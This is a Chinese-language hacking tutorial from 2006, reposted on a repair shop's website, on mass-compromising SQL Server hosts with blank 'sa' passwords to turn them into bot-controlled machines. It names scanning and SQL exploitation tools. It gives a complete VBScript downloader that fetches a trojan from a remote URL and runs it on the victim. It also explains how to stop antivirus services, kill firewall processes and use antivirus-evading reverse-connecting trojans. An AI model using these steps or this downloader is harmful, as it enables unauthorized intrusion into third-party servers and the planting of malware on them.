数据读取中...
 您当前位置:惠州维修 -> 网络-> 黑客技术交流 文章搜索:  
sa空口令之快速抓肉鸡
作者:转载 来源:惠州维修
日期: 2006-11-19
放大字体显示 缩小字体显示 打印文章 推荐给朋友

sa空口令之快速抓肉鸡

黑基原创
作者:lucky_feng
      不要以为这个世界没有sa空口令的机器了,或许作为一个服务器的很少,但是现在很多软件都是使用sql数据库的,而软件的设计者(公司)一般都设置sql密码是空口令。最近发现某地一款政府指定使用的税务软件就是空口令,而且安装的专业人员都是这么设置的。

准备工具:WINNTAutoAttack sql综合利用工具
1:使用WINNTAutoAttack扫描sql空口令的ip,ip自己选择好了。如果RP没有问题的话,肯定会有的,只是多少的问题而已。
2:打开sql综合利用工具,填入你扫到的sa空口令的ip,其他都是默认的。
3:连接成功以后,有两个方法。
方法一:上传那里直接上传一个木马,当然不要文件太大了,最好是免杀的。然后在直接执行dos命令运行你的木马文件就行了。
方法二:在命令行echo一个down.vbs进去,down.vbs内容如下:
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

echo完以后,最好type 你的文件名 看看成不成功。成功的话,c:\down.vbs
http://www.sina.com/muma.exe c:\muma.exe (假设你的down.vbs放在c盘),然后直接dos下运行下载的木马就行了。

问题:
1:有人说开3389最好了,但是开3389没有这么方便的了,还不如直接运行我们的反弹木马。
2:echo以后找不到这个文件。
原因可能是down.vbs被杀。
解决方法:瑞星2006和卡巴好像停不了服务的,看看上边的方法一可不可以吧。其它的杀毒软件dos命令察看服务名称,直接 net stop 服务名 就可以了。
3:木马上传以后找不到文件。
原因:被杀,免杀或者停掉杀毒软件。
4:反弹木马运行以后,连不到我的客户端。
原因可能是对方开了
防火墙,停掉对应的服务或者杀掉对方的进程即可。
5:不能执行dos命令的,建议你放弃吧。肉鸡这么多,何不执著在这么一台呢?
6:dos命令不会的,google or baidu。

文章页数:[1] 
帮助你我他: 1.我有问题请教 2.我要投稿>>>
更多相关资料搜索:
热点文章
最新文章
相关文章
版权申明:除部分特别声明不要转载,或者授权本站独家播发的文章外,大家可以自由转载本站的原创文章,但原作者和来自本站的链接必须保留(非本站原创的,按照原来自一节,自行链接)。文章版权归本站和作者共有。
转载要求:转载之图片、文件,链接请不要盗链到本站,且不准打上各自站点的水印,亦不能抹去本站水印。
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
发表评论  打印  刷新  推荐给朋友  返回顶部  关闭

网上大名: